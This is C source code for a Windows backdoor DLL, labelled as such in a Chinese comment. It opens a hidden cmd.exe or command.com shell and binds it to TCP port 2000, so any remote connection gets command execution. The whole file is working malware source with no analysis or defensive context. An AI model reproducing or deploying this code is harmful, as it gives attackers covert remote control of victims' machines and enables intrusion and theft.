/*
	后門DLL,開兩個線程一個返回另一個實(shí)現(xiàn)
	綁定cmd.exe或command.com功能 tcp 2000
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <winnt.h>

VOID FAR PASCAL Mbegin();
DWORD MyThreadId1;

static VOID MyThreadFn1(char Parameter);

VOID FAR PASCAL Mbegin()

{
	SECURITY_ATTRIBUTES mthread1;
	mthread1.bInheritHandle=TRUE;
	mthread1.lpSecurityDescriptor=NULL;
	mthread1.nLength=sizeof(SECURITY_ATTRIBUTES);

	CreateThread(&mthread1,0,

					     (LPTHREAD_START_ROUTINE) MyThreadFn1,

						 NULL,0,&MyThreadId1);

	return;

}

static VOID MyThreadFn1(char host)

{  

	fd_set fdsr;

	char enter[]={0x0d};

	int ver=-1;

	TIMEVAL tm;

	tm.tv_sec=0;

	tm.tv_usec=50;

//取得系統(tǒng)版本

	DWORD	dwVersion = GetVersion();

	char *cmdLine;

	DWORD dwWindowsMajorVersion =  (DWORD)(LOBYTE(LOWORD(dwVersion)));

	DWORD dwWindowsMinorVersion =  (DWORD)(HIBYTE(LOWORD(dwVersion)));



	if (dwVersion < 0x80000000)

	{ 

		ver=1;

    	cmdLine= "cmd.exe";

	}



	else 

	{

		ver=0;

    	cmdLine= "command.com";

	}

	char Buff[4096];

	int ret;



    WSADATA WSAData;



	WSAStartup((WORD)((1<<8)|1),(LPWSADATA) &WSAData);

		SOCKET listenFD,clientFD;

	SECURITY_ATTRIBUTES sa;

	struct sockaddr_in server;

	int iAddrSize = sizeof(server);



	HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;

	STARTUPINFO si;



	PROCESS_INFORMATION ProcessInformation;

	unsigned long lBytesRead;



	DWORD dwLen;



	listenFD = socket(AF_INET,SOCK_STREAM,0);

	clientFD = socket(AF_INET,SOCK_STREAM,0);



	server.sin_family = AF_INET;

	server.sin_port = htons(2000);

	server.sin_addr.s_addr=INADDR_ANY;



	sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true;



	ret=bind(listenFD,(sockaddr *)&server,sizeof(server));



	ret=listen(listenFD,2);

//接受連接

begin:

	clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);

	if(clientFD==INVALID_SOCKET)

			ExitThread(0);







	ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);

	ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);



	memset(&si,0,sizeof(STARTUPINFO));

//執(zhí)行cmdLine

	GetStartupInfo(&si);

	si.cb=sizeof(STARTUPINFO);

	si.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW ;

	si.wShowWindow=SW_HIDE;

	si.hStdError=hWritePipe1;

	si.hStdInput=hReadPipe2;

	si.hStdOutput=hWritePipe1;

	ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);

	if(ret==0)

	{

		CloseHandle(hWritePipe2);

		CloseHandle(hReadPipe1);

		CloseHandle(hReadPipe2);

		CloseHandle(hWritePipe1);

		closesocket(clientFD);

		ExitThread(0);

	}

//處理命令

 Sleep(200);

	while(1) {



	memset(Buff,0,4096);

    FD_ZERO(&fdsr);

    FD_SET(clientFD,&fdsr);

	ret=select(NULL, &fdsr, NULL, NULL, &tm);

	if ( ret!= 0&&ret!=SOCKET_ERROR)

	{

	      

		if (FD_ISSET(clientFD,&fdsr))

			lBytesRead=recv(clientFD,Buff,4096,0);

		if(lBytesRead<=0)

			goto end;

		ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);

		if(!ret)

			goto end;

		if(ver==0)

			ret=WriteFile(hWritePipe2,enter,1,&lBytesRead,0);

		if(!ret)

			goto end;

   }



	memset(Buff,0,4096);

  	PeekNamedPipe(hReadPipe1,NULL,0,NULL,&dwLen,NULL);

	if(dwLen>0)

	{

		ret=ReadFile(hReadPipe1,Buff,dwLen,&lBytesRead,0);

		 if(!ret)

			 goto end;

		ret=send(clientFD,Buff,dwLen,0);

		if(ret<=0)

			goto end;

	}

	}

end:



	CloseHandle(hWritePipe2);

	CloseHandle(hReadPipe1);

	CloseHandle(hReadPipe2);

	CloseHandle(hWritePipe1);

	closesocket(clientFD);

	Sleep(1000);

	goto begin;

    ExitThread(0);

}